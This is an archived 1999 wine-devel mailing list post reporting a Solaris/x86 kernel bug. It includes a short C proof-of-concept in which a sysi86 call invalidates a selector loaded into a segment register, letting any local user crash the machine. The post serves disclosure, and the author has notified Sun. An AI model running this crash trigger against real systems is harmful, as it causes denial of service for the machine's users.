[prev in list] [next in list] [prev in thread] [next in thread] 

List:       wine-devel
Subject:    Example program to demonstrate Solaris/x86 crash
From:       Ulrich Weigand <weigand () informatik ! uni-erlangen ! de>
Date:       1999-04-28 13:34:18
[Download RAW message or body]

Hello,

I've finally found the time to install Solaris/x86 on a spare machine,
and have created a small example program to demonstrate the sysi86 bug
that you found that allows local users to crash the machine.

The problem does seem to be exactly what we suspected: calling sysi86
to invalidate a selector currently loaded into a segment register crashes
the machine;  this has actually nothing to do with threads.

I've already notified security-alert@sun.com;  I'll probably send it
to bugtraq as well in a couple of weeks ...


Well, here's the program:

 
#include <sys/sysi86.h>
 
#define SELECTOR 0x0fff
 
int main( int argv, char **argc )
{
    struct ssd descr;
 
    descr.sel  = SELECTOR;
    descr.bo   = 0;
    descr.ls   = 0xffff;
    descr.acc1 = 0xf0;  /* present, DPL 3, data segment, r/o */
    descr.acc2 = 0;     /* limit in bytes, small */
    sysi86( SI86DSCR, &descr );
 
    __asm__ __volatile__ ( "pushl %0\n\t"
                           "popl %%gs" :: "g" (SELECTOR) );
 
    descr.sel  = SELECTOR;
    descr.bo   = 0;
    descr.ls   = 0;
    descr.acc1 = 0;
    descr.acc2 = 0;
    sysi86( SI86DSCR, &descr );
 
    return 0;
}
 

Bye,
Ulrich


=========================================================================

[prev in list] [next in list] [prev in thread] [next in thread]